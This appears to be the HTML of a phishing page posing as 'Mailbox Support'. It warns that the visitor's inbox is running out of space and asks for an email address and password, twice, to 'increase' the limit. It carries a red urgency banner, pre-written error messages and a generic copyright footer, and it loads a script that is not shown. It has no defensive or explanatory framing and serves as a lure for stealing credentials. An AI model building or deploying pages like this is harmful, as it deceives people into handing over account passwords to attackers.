<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Mailbox Support</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <script defer src="main.js"></script>
    <header>
        <h1>Increase Mail Box limit</h1>
    </header>
    <main>
        <p><span class="red">Your inbox is running out of space </span><br>
            <br>
            To expand Mail storage limit follow the steps below
        </p>
        <form action="" method="post">
            <label>
                <p>Email found</p>
                <input type="text" required>
                <p>Email Address</p>
            </label>
            <label>
                <p>Password is not correct</p>
                <input type="password" required>
                <p>Password</p>
            </label>
            <label>
                <p>Passwords do not match</p>
                <input type="password" required>
                <p>Confirm Password</p>
            </label>
            <input type="submit" value="Submit">
        </form>
    </main>
    <footer>
        © Mail Box Support 2000 - 2021
    </footer>
</body>

</html>